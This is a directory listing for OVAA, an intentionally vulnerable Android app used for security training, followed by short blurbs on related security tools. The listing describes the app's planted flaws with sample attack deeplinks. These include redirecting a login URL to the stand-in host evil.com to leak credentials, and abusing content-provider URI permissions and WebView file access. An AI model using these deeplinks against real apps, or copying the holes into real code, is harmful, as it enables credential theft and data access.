OVAA (Oversecured Vulnerable Android App)

Free

OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.

List of vulnerabilities:

- Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in.
- Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider.
- Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=....
- Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(

ALTERNATIVES

DroidBox is a tool for dynamic analysis of Android applications, providing insights into package behavior and security.

A project providing a low-cost ICS testbed with affordable hardware, instructions, and attacker scenarios to facilitate learning in industrial security.

iOS Reverse Engineering Toolkit for automating common tasks in iOS penetration testing.

A Graphical Realism Framework for Industrial Control Simulation organized as 5 VirtualBox VMs for realistic ICS network simulation.

Altoro Mutual offers online banking, real estate financing, business credit cards, retirement solutions, and prioritizes privacy and security.

A Python tool for patching Dalvik bytecode in DEX files and assisting in Android application analysis.

A data-mining and deep web asset search engine for breach analysis and prevention services.

AVEVA is a global leader in industrial software offering solutions for various industries and specializing in engineering, operations, data management, and digital transformation.
